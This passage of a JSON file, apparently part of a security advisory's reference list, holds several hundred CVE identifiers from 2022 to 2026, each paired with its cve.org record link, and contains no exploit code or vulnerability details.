{
"name": "CVE-2025-40274",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40274"
},
{
"name": "CVE-2025-68797",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68797"
},
{
"name": "CVE-2023-54136",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54136"
},
{
"name": "CVE-2023-54225",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54225"
},
{
"name": "CVE-2025-40220",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40220"
},
{
"name": "CVE-2025-68237",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68237"
},
{
"name": "CVE-2023-54194",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54194"
},
{
"name": "CVE-2025-40257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40257"
},
{
"name": "CVE-2025-68259",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68259"
},
{
"name": "CVE-2025-71125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71125"
},
{
"name": "CVE-2026-23006",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23006"
},
{
"name": "CVE-2025-71108",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71108"
},
{
"name": "CVE-2025-68789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68789"
},
{
"name": "CVE-2025-68312",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68312"
},
{
"name": "CVE-2023-53843",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53843"
},
{
"name": "CVE-2025-68284",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68284"
},
{
"name": "CVE-2025-68194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68194"
},
{
"name": "CVE-2025-38379",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38379"
},
{
"name": "CVE-2025-71195",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71195"
},
{
"name": "CVE-2025-40006",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40006"
},
{
"name": "CVE-2026-23083",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23083"
},
{
"name": "CVE-2026-23088",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23088"
},
{
"name": "CVE-2023-53844",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53844"
},
{
"name": "CVE-2025-68183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68183"
},
{
"name": "CVE-2025-40263",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40263"
},
{
"name": "CVE-2023-54026",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54026"
},
{
"name": "CVE-2026-23108",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23108"
},
{
"name": "CVE-2025-68244",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68244"
},
{
"name": "CVE-2025-40231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40231"
},
{
"name": "CVE-2025-40278",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40278"
},
{
"name": "CVE-2025-71194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71194"
},
{
"name": "CVE-2025-40342",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40342"
},
{
"name": "CVE-2026-23023",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23023"
},
{
"name": "CVE-2023-53858",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53858"
},
{
"name": "CVE-2023-53992",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53992"
},
{
"name": "CVE-2026-22999",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22999"
},
{
"name": "CVE-2023-54266",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54266"
},
{
"name": "CVE-2025-71082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71082"
},
{
"name": "CVE-2025-68222",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68222"
},
{
"name": "CVE-2026-23068",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23068"
},
{
"name": "CVE-2025-68765",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68765"
},
{
"name": "CVE-2023-53825",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53825"
},
{
"name": "CVE-2026-23089",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23089"
},
{
"name": "CVE-2025-71132",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71132"
},
{
"name": "CVE-2025-71225",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71225"
},
{
"name": "CVE-2023-54072",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54072"
},
{
"name": "CVE-2025-38322",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38322"
},
{
"name": "CVE-2026-23071",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23071"
},
{
"name": "CVE-2023-54134",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54134"
},
{
"name": "CVE-2026-23056",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23056"
},
{
"name": "CVE-2023-54184",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54184"
},
{
"name": "CVE-2025-71077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71077"
},
{
"name": "CVE-2023-54291",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54291"
},
{
"name": "CVE-2025-40279",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40279"
},
{
"name": "CVE-2023-53865",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53865"
},
{
"name": "CVE-2025-68328",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68328"
},
{
"name": "CVE-2025-40201",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40201"
},
{
"name": "CVE-2026-23063",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23063"
},
{
"name": "CVE-2023-53823",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53823"
},
{
"name": "CVE-2026-23073",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23073"
},
{
"name": "CVE-2023-54023",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54023"
},
{
"name": "CVE-2025-71114",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71114"
},
{
"name": "CVE-2026-23058",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23058"
},
{
"name": "CVE-2025-68744",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68744"
},
{
"name": "CVE-2025-71182",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71182"
},
{
"name": "CVE-2023-54241",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54241"
},
{
"name": "CVE-2025-68320",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68320"
},
{
"name": "CVE-2026-23038",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23038"
},
{
"name": "CVE-2023-54017",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54017"
},
{
"name": "CVE-2023-53257",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53257"
},
{
"name": "CVE-2026-22990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22990"
},
{
"name": "CVE-2023-53787",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53787"
},
{
"name": "CVE-2026-23000",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23000"
},
{
"name": "CVE-2025-68172",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68172"
},
{
"name": "CVE-2026-23176",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23176"
},
{
"name": "CVE-2025-39998",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39998"
},
{
"name": "CVE-2024-53149",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53149"
},
{
"name": "CVE-2025-40338",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40338"
},
{
"name": "CVE-2026-23026",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23026"
},
{
"name": "CVE-2025-40134",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40134"
},
{
"name": "CVE-2026-23128",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23128"
},
{
"name": "CVE-2025-68325",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68325"
},
{
"name": "CVE-2025-71190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71190"
},
{
"name": "CVE-2023-54154",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54154"
},
{
"name": "CVE-2025-71089",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71089"
},
{
"name": "CVE-2023-54141",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54141"
},
{
"name": "CVE-2023-53766",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53766"
},
{
"name": "CVE-2026-23107",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23107"
},
{
"name": "CVE-2025-68296",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68296"
},
{
"name": "CVE-2023-53785",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53785"
},
{
"name": "CVE-2025-40328",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40328"
},
{
"name": "CVE-2025-68332",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68332"
},
{
"name": "CVE-2023-54263",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54263"
},
{
"name": "CVE-2025-71104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71104"
},
{
"name": "CVE-2026-22978",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22978"
},
{
"name": "CVE-2025-40283",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40283"
},
{
"name": "CVE-2025-40324",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40324"
},
{
"name": "CVE-2023-54181",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54181"
},
{
"name": "CVE-2025-68378",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68378"
},
{
"name": "CVE-2026-23146",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23146"
},
{
"name": "CVE-2023-53795",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53795"
},
{
"name": "CVE-2026-23037",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23037"
},
{
"name": "CVE-2025-40250",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40250"
},
{
"name": "CVE-2025-40264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40264"
},
{
"name": "CVE-2025-38728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38728"
},
{
"name": "CVE-2026-23001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23001"
},
{
"name": "CVE-2025-68367",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68367"
},
{
"name": "CVE-2025-71224",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71224"
},
{
"name": "CVE-2025-68820",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68820"
},
{
"name": "CVE-2025-40321",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40321"
},
{
"name": "CVE-2023-54207",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54207"
},
{
"name": "CVE-2025-68249",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68249"
},
{
"name": "CVE-2025-68740",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68740"
},
{
"name": "CVE-2025-40158",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40158"
},
{
"name": "CVE-2025-40179",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40179"
},
{
"name": "CVE-2025-68742",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68742"
},
{
"name": "CVE-2025-40282",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40282"
},
{
"name": "CVE-2023-53819",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53819"
},
{
"name": "CVE-2023-54210",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54210"
},
{
"name": "CVE-2025-40053",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40053"
},
{
"name": "CVE-2023-54030",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54030"
},
{
"name": "CVE-2025-68816",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68816"
},
{
"name": "CVE-2025-68192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68192"
},
{
"name": "CVE-2023-54092",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54092"
},
{
"name": "CVE-2025-68379",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68379"
},
{
"name": "CVE-2023-53997",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53997"
},
{
"name": "CVE-2025-68256",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68256"
},
{
"name": "CVE-2025-68777",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68777"
},
{
"name": "CVE-2025-68254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68254"
},
{
"name": "CVE-2026-23221",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23221"
},
{
"name": "CVE-2026-23151",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23151"
},
{
"name": "CVE-2025-71145",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71145"
},
{
"name": "CVE-2025-68171",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68171"
},
{
"name": "CVE-2026-23152",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23152"
},
{
"name": "CVE-2025-40301",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40301"
},
{
"name": "CVE-2025-22047",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22047"
},
{
"name": "CVE-2026-22982",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22982"
},
{
"name": "CVE-2023-54224",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54224"
},
{
"name": "CVE-2023-54235",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54235"
},
{
"name": "CVE-2025-71222",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71222"
},
{
"name": "CVE-2025-71118",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71118"
},
{
"name": "CVE-2023-54032",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54032"
},
{
"name": "CVE-2025-68327",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68327"
},
{
"name": "CVE-2023-6040",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6040"
},
{
"name": "CVE-2023-53856",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53856"
},
{
"name": "CVE-2025-40318",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40318"
},
{
"name": "CVE-2025-71229",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71229"
},
{
"name": "CVE-2026-23213",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23213"
},
{
"name": "CVE-2026-23091",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23091"
},
{
"name": "CVE-2025-68241",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68241"
},
{
"name": "CVE-2023-53817",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53817"
},
{
"name": "CVE-2023-53782",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53782"
},
{
"name": "CVE-2023-54115",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54115"
},
{
"name": "CVE-2023-54069",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54069"
},
{
"name": "CVE-2025-71192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71192"
},
{
"name": "CVE-2023-54104",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54104"
},
{
"name": "CVE-2025-40135",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40135"
},
{
"name": "CVE-2026-23121",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23121"
},
{
"name": "CVE-2023-54027",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54027"
},
{
"name": "CVE-2025-39964",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39964"
},
{
"name": "CVE-2025-68734",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68734"
},
{
"name": "CVE-2025-68776",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68776"
},
{
"name": "CVE-2025-71066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71066"
},
{
"name": "CVE-2026-22993",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22993"
},
{
"name": "CVE-2025-71236",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71236"
},
{
"name": "CVE-2023-53851",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53851"
},
{
"name": "CVE-2025-68345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68345"
},
{
"name": "CVE-2025-71097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71097"
},
{
"name": "CVE-2023-54183",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54183"
},
{
"name": "CVE-2023-53841",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53841"
},
{
"name": "CVE-2023-54326",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54326"
},
{
"name": "CVE-2023-54267",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54267"
},
{
"name": "CVE-2023-54282",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54282"
},
{
"name": "CVE-2025-71234",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71234"
},
{
"name": "CVE-2025-40310",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40310"
},
{
"name": "CVE-2022-50697",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50697"
},
{
"name": "CVE-2025-70873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-70873"
},
{
"name": "CVE-2025-71111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71111"
},
{
"name": "CVE-2026-22985",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22985"
},
{
"name": "CVE-2023-54006",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54006"
},
{
"name": "CVE-2023-53784",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53784"
},
{
"name": "CVE-2023-54067",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54067"
},
{
"name": "CVE-2023-54264",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54264"
},
{
"name": "CVE-2025-71185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71185"
},
{
"name": "CVE-2025-40331",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40331"
},
{
"name": "CVE-2026-23096",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23096"
},
{
"name": "CVE-2025-68337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68337"
},
{
"name": "CVE-2025-68351",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68351"
},
{
"name": "CVE-2023-54304",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54304"
},
{
"name": "CVE-2025-38488",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38488"
},
{
"name": "CVE-2025-71131",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71131"
},
{
"name": "CVE-2023-54125",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54125"
},
{
"name": "CVE-2023-54173",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54173"
},
{
"name": "CVE-2023-53743",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53743"
},
{
"name": "CVE-2025-71116",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71116"
},
{
"name": "CVE-2023-53842",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53842"
},
{
"name": "CVE-2025-68208",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68208"
},
{
"name": "CVE-2025-68362",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68362"
},
{
"name": "CVE-2025-71232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71232"
},
{
"name": "CVE-2023-53762",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53762"
},
{
"name": "CVE-2025-68290",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68290"
},
{
"name": "CVE-2025-40280",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40280"
},
{
"name": "CVE-2025-40099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40099"
},
{
"name": "CVE-2025-71162",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71162"
},
{
"name": "CVE-2025-40293",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40293"
},
{
"name": "CVE-2025-68750",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68750"
},
{
"name": "CVE-2023-54127",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54127"
},
{
"name": "CVE-2023-53861",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53861"
},
{
"name": "CVE-2025-68803",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68803"
},
{
"name": "CVE-2026-22996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22996"
},
{
"name": "CVE-2025-68331",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68331"
},
{
"name": "CVE-2023-54137",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54137"
},
{
"name": "CVE-2026-23105",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23105"
},
{
"name": "CVE-2026-22976",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22976"
},
{
"name": "CVE-2023-54319",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54319"
},
{
"name": "CVE-2025-68305",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68305"
},
{
"name": "CVE-2025-40320",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40320"
},
{
"name": "CVE-2026-23141",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23141"
},
{
"name": "CVE-2026-23065",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23065"
},
{
"name": "CVE-2025-68753",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68753"
},
{
"name": "CVE-2023-54140",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54140"
},
{
"name": "CVE-2025-68775",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68775"
},
{
"name": "CVE-2026-23182",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23182"
},
{
"name": "CVE-2025-71112",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71112"
},
{
"name": "CVE-2023-54285",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54285"
},
{
"name": "CVE-2026-23086",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23086"
},
{
"name": "CVE-2023-54025",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54025"
},
{
"name": "CVE-2025-40192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40192"
},
{
"name": "CVE-2023-54229",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54229"
},
{
"name": "CVE-2025-68818",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68818"
},
{
"name": "CVE-2023-54300",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54300"
},
{
"name": "CVE-2025-39880",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39880"
},
{
"name": "CVE-2023-54042",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54042"
},
{
"name": "CVE-2023-53807",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53807"
},
{
"name": "CVE-2025-40102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40102"
},
{
"name": "CVE-2023-54302",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54302"
},
{
"name": "CVE-2025-40170",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40170"
},
{
"name": "CVE-2025-40160",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40160"
},
{
"name": "CVE-2025-40284",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40284"
},
{
"name": "CVE-2023-54178",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54178"
},
{
"name": "CVE-2023-54051",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54051"
},
{
"name": "CVE-2023-53808",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53808"
},
{
"name": "CVE-2025-71148",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71148"
},
{
"name": "CVE-2025-68366",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68366"
},
{
"name": "CVE-2024-53070",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53070"
},
{
"name": "CVE-2023-54008",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54008"
},
{
"name": "CVE-2026-23156",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23156"
},
{
"name": "CVE-2023-54014",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54014"
},
{
"name": "CVE-2025-68815",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68815"
},
{
"name": "CVE-2025-40215",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40215"
},
{
"name": "CVE-2025-40307",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40307"
},
{
"name": "CVE-2026-23095",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23095"
},
{
"name": "CVE-2025-68346",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68346"
},
{
"name": "CVE-2025-71163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71163"
},
{
"name": "CVE-2025-40211",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40211"
},
{
"name": "CVE-2026-23062",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23062"
},
{
"name": "CVE-2025-40042",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40042"
},
{
"name": "CVE-2023-54258",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54258"
},
{
"name": "CVE-2025-39890",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39890"
},
{
"name": "CVE-2025-71096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71096"
},
{
"name": "CVE-2025-71095",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71095"
},
{
"name": "CVE-2023-54221",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54221"
},
{
"name": "CVE-2025-68771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68771"
},
{
"name": "CVE-2025-68363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68363"
},
{
"name": "CVE-2025-40248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40248"
},
{
"name": "CVE-2025-39748",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39748"
},
{
"name": "CVE-2026-22984",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22984"
},
{
"name": "CVE-2025-68303",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68303"
},
{
"name": "CVE-2025-40259",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40259"
},
{
"name": "CVE-2023-53827",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53827"
},
{
"name": "CVE-2025-68757",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68757"
},
{
"name": "CVE-2023-54293",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54293"
},
{
"name": "CVE-2025-40329",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40329"
},
{
"name": "CVE-2026-23070",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23070"
},
{
"name": "CVE-2026-23033",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23033"
},
{
"name": "CVE-2026-22977",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22977"
},
{
"name": "CVE-2026-23145",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23145"
},
{
"name": "CVE-2022-50423",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50423"
},
{
"name": "CVE-2023-54060",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54060"
},
{
"name": "CVE-2026-23104",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23104"
},
{
"name": "CVE-2026-23003",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23003"
},
{
"name": "CVE-2025-68766",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68766"
},
{
"name": "CVE-2023-53778",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53778"
},
{
"name": "CVE-2025-39817",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39817"
},
{
"name": "CVE-2026-23076",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23076"
},
{
"name": "CVE-2023-54145",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54145"
},
{
"name": "CVE-2023-54171",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54171"
},
{
"name": "CVE-2023-54240",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54240"
},
{
"name": "CVE-2025-68168",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68168"
},
{
"name": "CVE-2025-71123",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71123"
},
{
"name": "CVE-2025-68206",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68206"
},
{
"name": "CVE-2023-54247",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54247"
},
{
"name": "CVE-2024-38542",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38542"
},
{
"name": "CVE-2025-71100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71100"
},
{
